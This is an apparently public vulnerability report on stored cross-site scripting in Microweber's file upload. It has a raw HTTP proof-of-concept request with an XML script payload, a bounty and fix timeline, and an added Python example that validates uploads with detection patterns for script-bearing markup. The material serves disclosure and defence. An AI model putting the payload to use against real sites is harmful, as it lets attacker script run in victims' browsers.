Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber


Reported on

Jul 2nd 2022


In the file upload function, the server allows uploading a .xlr file that contains JavaScript code, which leads to stored XSS.

Proof of Concept


POST /demo/plupload HTTP/1.1
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
        <a:script xmlns:a="">alert(window.origin)</a:script>


HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129





This vulnerability allows arbitrary JavaScript to be executed in the victim's browser, which can be used to perform HTTP requests, CSRF, read the content of same-origin pages, etc.
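The request above stores an XML document under a spreadsheet-style extension, and the server later hands it back in a way that lets the browser run the script element inside it in the site's origin. As an added example (not the report's code and not Microweber's code), the Python below shows the two server-side checks an upload handler should make before storing a file, an extension allowlist and a content sniff that rejects anything a browser could render as HTML/XML with script-capable markup, plus the response headers that stop a stored file from being rendered inline even if a check is bypassed. The allowlist, the regex rules, the header set and all function names are this example's assumptions; the sample payload is constructed after the one in the request above.

```python
"""Upload validation and safe download headers for a CMS upload endpoint.

Added example; the policy below is assumed, not taken from the project.
"""
import re
from pathlib import PurePosixPath

# Assumed policy: an allowlist, so an unusual extension such as .xlr is
# rejected by default instead of having to appear on a denylist.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp", "pdf", "zip", "txt", "csv"}

# Leading byte patterns from the WHATWG MIME Sniffing "unknown type" table:
# a browser may render a file that starts with one of these as HTML even
# when the extension or a vague Content-Type says otherwise.
HTML_SNIFF_TAGS = (b"<!doctype html", b"<html", b"<head", b"<script", b"<iframe",
                   b"<h1", b"<div", b"<font", b"<table", b"<a", b"<style", b"<title",
                   b"<b", b"<body", b"<br", b"<p", b"<!--")

# Markup that makes a document executable: script-bearing elements (with
# any namespace prefix, so <a:script> is caught), inline event handlers,
# and script URLs in attribute values.
ACTIVE_ELEMENT = re.compile(
    r"<\s*(?:[A-Za-z_][\w.-]*:)?(script|iframe|object|embed|foreignObject)\b", re.I)
EVENT_HANDLER = re.compile(r"\son[a-z]+\s*=", re.I)
SCRIPT_URL = re.compile(r"=\s*[\"']?\s*(?:javascript|vbscript):", re.I)


def extension_of(filename: str) -> str:
    return PurePosixPath(filename).suffix.lstrip(".").lower()


def looks_like_markup(data: bytes) -> bool:
    """True if a browser could sniff this content as HTML or XML."""
    head = data.lstrip(b"\xef\xbb\xbf\t\n\r \x0c")[:64].lower()
    if head.startswith(b"<?xml"):
        return True
    for tag in HTML_SNIFF_TAGS:
        # The sniffing table requires a space or '>' right after the tag.
        if head.startswith(tag) and head[len(tag):len(tag) + 1] in (b" ", b">"):
            return True
    return False


def find_active_content(data: bytes) -> list[str]:
    """Describe the script-capable constructs found in a markup file."""
    text = data.decode("utf-8", errors="replace")
    findings = [f"element <{m.group(1).lower()}>" for m in ACTIVE_ELEMENT.finditer(text)]
    if EVENT_HANDLER.search(text):
        findings.append("inline event handler attribute")
    if SCRIPT_URL.search(text):
        findings.append("javascript:/vbscript: URL")
    return findings


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Both the name and the bytes must pass."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '.{ext}' is not in the allowlist"
    if looks_like_markup(data):
        active = find_active_content(data)
        if active:
            return False, "markup with active content: " + ", ".join(active)
        return False, "file content sniffs as HTML/XML"
    return True, "ok"


def download_headers(filename: str, content_type: str) -> dict[str, str]:
    """Headers for serving a stored upload so the browser never treats it as
    a document in the site's origin, even if the upload check was bypassed."""
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample in the shape of the payload from the request above.
XLR_PAYLOAD = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
               b'<a:script xmlns:a="">alert(window.origin)</a:script>\n')

if __name__ == "__main__":
    samples = [
        ("sheet.xlr", XLR_PAYLOAD),                        # bad extension
        ("sheet.png", XLR_PAYLOAD),                        # renamed, bad content
        ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),  # accepted
        ("note.txt", b"<html><body onload=alert(1)>"),    # allowed ext, bad content
    ]
    for name, blob in samples:
        print(name, check_upload(name, blob))
    print(download_headers("sheet.xlr", "application/octet-stream"))
```

The content sniff is a defence in depth, not the fix by itself: a regex scan over markup can be evaded, so the headers from `download_headers` (or serving uploads from a separate origin) are what actually keep a stored file from running script in the application's origin.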

We are processing your report and will contact the microweber team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
Nhien.IT modified the report
a year ago
We have contacted a member of the microweber team and are waiting to hear back a year ago
Peter Ivanov modified the Severity from Medium to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.18 with commit 39797c a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1161 has been validated
Peter Ivanov
a year ago


Thanks for the report. In order to upload the .xlr file you need to be logged in as admin

a year ago


Yah! Thank you, sir!
